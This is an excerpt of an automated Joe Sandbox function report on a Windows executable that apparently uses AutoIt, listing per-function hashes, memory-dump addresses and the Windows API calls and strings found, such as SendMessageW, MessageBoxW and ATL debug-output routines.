              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameSend_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 372448540-1403004172
              • Opcode ID: 844d780182238a0870da0b887695b9795ea7c9c0d598dbf0d3057f4c7a8d40ef
              • Instruction ID: ede222b06e08fff6e176a3519ec384f0d16ec9467bdc981b20fcd30a891265b1
              • Opcode Fuzzy Hash: 844d780182238a0870da0b887695b9795ea7c9c0d598dbf0d3057f4c7a8d40ef
              • Instruction Fuzzy Hash: 8E018875A4520477CB18FBA0C9D2DFF73ACDF55700F1501167512672C1DB11AF189671
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000182,?,00000000), ref: 001D92D0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameSend_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 372448540-1403004172
              • Opcode ID: 8e198880c204e262879facb58846ac4a48923d30827b79d2eb86d4d3cd424605
              • Instruction ID: 61268284bba1a549791e746c2bfffde8db857db4e069d5d18bff57ad6c791963
              • Opcode Fuzzy Hash: 8e198880c204e262879facb58846ac4a48923d30827b79d2eb86d4d3cd424605
              • Instruction Fuzzy Hash: 7501A2B1A85208B7CB14FAA4C9C2EFF77AC9F21700F650116B912636C2DB219F0896B1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __calloc_crt
              • String ID: @R$
              • API String ID: 3494438863-995463125
              • Opcode ID: 011e8463a16827c9ba156b3b7a209952a703403d718cb62ba10ea02fca8c927c
              • Instruction ID: 05187fa2eb613cc9f0e32838380f99f1d7340feda6bc35aa8bcb8509331c849c
              • Opcode Fuzzy Hash: 011e8463a16827c9ba156b3b7a209952a703403d718cb62ba10ea02fca8c927c
              • Instruction Fuzzy Hash: 8AF0967D718B16BBF728CF68FD097A12795E713764F190427E600DB595EBB088818681
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassName_wcscmp
              • String ID: #32770
              • API String ID: 2292705959-463685578
              • Opcode ID: 6fd92f2df662c0b9078dd49e97403609572ae704ce753805f8705a10865cb42a
              • Instruction ID: 1572c38db34817e7f0366be30e4e32993550e576166f64aed510da5e3e635cdc
              • Opcode Fuzzy Hash: 6fd92f2df662c0b9078dd49e97403609572ae704ce753805f8705a10865cb42a
              • Instruction Fuzzy Hash: C0E0617390032D17D3209B95AC09F97F7ACEB51731F000067FD10D3050D760994487D1
              APIs
              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001D81CA
                • Part of subcall function 001A3598: _doexit.LIBCMT ref: 001A35A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Message_doexit
              • String ID: AutoIt$Error allocating memory.
              • API String ID: 1993061046-4017498283
              • Opcode ID: 740164e35fa5a28b0690af001530ad492a0c22a77fdad2651c8888bac1a796a0
              • Instruction ID: 6f11057b072fbd71987adb9f8209cdbf95eb2282d88ccc424dafe21758c8137c
              • Opcode Fuzzy Hash: 740164e35fa5a28b0690af001530ad492a0c22a77fdad2651c8888bac1a796a0
              • Instruction Fuzzy Hash: FAD05B373C531936D21532A87D0BFC6768C4B27B51F104416BB18955D38FD295E142D9
              APIs
                • Part of subcall function 001BB564: _memset.LIBCMT ref: 001BB571
                • Part of subcall function 001A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001BB540,?,?,?,0018100A), ref: 001A0B89
              • IsDebuggerPresent.KERNEL32(?,?,?,0018100A), ref: 001BB544
              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0018100A), ref: 001BB553
              Strings
              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001BB54E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
              • API String ID: 3158253471-631824599
              • Opcode ID: 0c31c372081aab4797a600ed082197860bbbc9b3cae06b8797389d83e1fb0d5c
              • Instruction ID: c640acb9f354692e785f7d44b18c107142c5cfa6af19ea0c4aa5d949bea2883f
              • Opcode Fuzzy Hash: 0c31c372081aab4797a600ed082197860bbbc9b3cae06b8797389d83e1fb0d5c
              • Instruction Fuzzy Hash: 1FE06D742043209FD371DF68F6483827BE0AF05754F00892CF846C2A61D7F5E908CB62